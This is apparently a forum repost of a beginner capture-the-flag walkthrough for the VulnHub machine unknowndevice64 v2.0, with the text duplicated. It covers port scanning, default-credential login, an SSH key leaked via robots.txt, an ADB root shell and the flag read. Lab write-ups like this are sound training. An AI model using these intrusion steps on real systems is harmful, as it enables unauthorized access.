Sgxw
Shoujo Dreamer
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Today we are going to take on another boot2root challenge âuknowndevice64 v2.0â by Ajay Verma. Our goal is to get root and read flag.txt with at least two different ways.
Download it from here: https://download.vulnhub.com/unknowndevice64/unknowndevice64-V2.0.ova
Difficulty: Beginner
Penetrating Methodology:
Scanning
Enumeration
Exploiting
Privilege Escalation
Capture the Flag
Walkthrough
Scanning:
Letâs start off by scanning the network and identifying host IPs. We can identify our host IP as 192.168.1.22 by using netdiscover. Next, we have to scan this IP using nmap.
The result shows that freeciv is running on port 5555, ssh is running on port 6465 and netbus is running on 12345.
First, we try to open the IP into browser with port 12345 we were prompted to login. So, we tried the basic credentials with different combinations and got succeeded with âAdministratorâ as username and password as âpasswordâ.
After logging in, a webpage appeared as you can see here. But nothing of our use.
Then tried to access the robots.txt file. We got lucky and found a file here named â./info.phpâ inside it.
When we opened this in the browser, we are prompted to download it.
When we open this downloaded file, we got an SSH private key inside it. So, we copied the text from âBEGIN RSA PRIVATE KEYâ to âEND RSA PRIVATE KEYâ and saved it in a file named âsshkeyâ. Besides this key we can see âunkn0wnd3vic3-64â at the end of the file, letâs save this as of now.
Here first we have changed permission for the file âsshkeyâ. Then login into ssh using this file on port 6465(as ssh is running on port 6465). And we are asked to enter a passphrase for this ssh key.so we used the text â
We spotted a directory named âsystemâ and inside system, we found a file âflag.txtâ. This is our flag!
Another way
We will be using previously gained information to save time. As we knew from Nmap scan that freeciv is running on port 5555 so tried to connect it with adb. After getting a shell, we switched to root and captured the flag (as we already knew the flag is inside flag.txt within system directory).
Finally!! The challenge is completed, and we have grabbed the flag.txt file using two different approaches.
Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here
Download it from here: https://download.vulnhub.com/unknowndevice64/unknowndevice64-V2.0.ova
Difficulty: Beginner
Penetrating Methodology:
Scanning
- Netdiscover
- NMAP
Enumeration
- Web Directory search
- Credential harvesting
Exploiting
- SSH login (1st Method)
- ADB login (2nd Method)
Privilege Escalation
- Exploit sudo rights
Capture the Flag
Walkthrough
Scanning:
Letâs start off by scanning the network and identifying host IPs. We can identify our host IP as 192.168.1.22 by using netdiscover. Next, we have to scan this IP using nmap.
Code:
netdiscover
nmap -p- -A 192.168.1.22The result shows that freeciv is running on port 5555, ssh is running on port 6465 and netbus is running on 12345.
First, we try to open the IP into browser with port 12345 we were prompted to login. So, we tried the basic credentials with different combinations and got succeeded with âAdministratorâ as username and password as âpasswordâ.
After logging in, a webpage appeared as you can see here. But nothing of our use.
Then tried to access the robots.txt file. We got lucky and found a file here named â./info.phpâ inside it.
When we opened this in the browser, we are prompted to download it.
When we open this downloaded file, we got an SSH private key inside it. So, we copied the text from âBEGIN RSA PRIVATE KEYâ to âEND RSA PRIVATE KEYâ and saved it in a file named âsshkeyâ. Besides this key we can see âunkn0wnd3vic3-64â at the end of the file, letâs save this as of now.
Here first we have changed permission for the file âsshkeyâ. Then login into ssh using this file on port 6465(as ssh is running on port 6465). And we are asked to enter a passphrase for this ssh key.so we used the text â
â that we saved from info.php and it worked. After that, we switched as root user and listed the content of root.
Code:
chmod 600 sshkey
ssh -i sshkey 192.168.1.22 -p 6465
su root
lsWe spotted a directory named âsystemâ and inside system, we found a file âflag.txtâ. This is our flag!
Another way
We will be using previously gained information to save time. As we knew from Nmap scan that freeciv is running on port 5555 so tried to connect it with adb. After getting a shell, we switched to root and captured the flag (as we already knew the flag is inside flag.txt within system directory).
Code:
abd connect 192.168.1.22:5555
abd shell
su root
cat system/flag.txtFinally!! The challenge is completed, and we have grabbed the flag.txt file using two different approaches.
Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here